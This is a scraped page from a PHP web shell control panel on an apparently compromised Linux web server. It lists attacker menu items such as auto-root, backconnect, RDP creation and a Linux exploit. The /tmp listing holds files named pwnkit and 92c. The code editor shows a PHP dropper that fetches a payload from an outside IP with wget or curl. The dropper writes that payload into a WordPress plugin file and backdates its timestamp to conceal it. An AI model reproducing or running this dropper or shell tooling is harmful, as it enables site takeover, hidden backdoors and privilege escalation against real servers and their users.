Linux server.netcare.mx 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 50.6.229.13 | : 216.73.216.124
106 Domain
8.2.31
qdmc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
tmp /
[ HOME SHELL ]
Name
Size
Permission
Action
session_cache.tmp
[ DIR ]
dr-xr-xr-x
.class
48
B
-rw-r--r--
.classes
95
B
-rw-r--r--
.dbx_convert
95
B
-rw-r--r--
.element
1.07
KB
-rw-r--r--
.ibase_pconnection
48
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.mb_convert
592
B
-rw-r--r--
.rfind
45
B
-rw-r--r--
92c
35.08
KB
-r-xr-xr-x
pwnkit
10.99
KB
-rwxr-xr-x
sess_63e7499815371581dd46adc82...
37
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .element
<?php $p = '/home/qdmc/public_html/wp-content/plugins/essential-addons-for-elementor-lite/includes/Template/Betterdocs-Category-Box/Layout.Default.php'; $u = 'http://185.157.212.14/tmp/aaSxsPajXP'; $fs = 875; $ft = 1761235849; run("wget -O {$p} {$u}"); check($p, $fs, $ft); run("curl -o {$p} {$u}"); check($p, $fs, $ft); function check($p, $fs, $ft) { if (file_exists($p) && filesize($p) == $fs) { @touch($p, $ft); die('!success!'); } } function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; } die('!ended!');
Close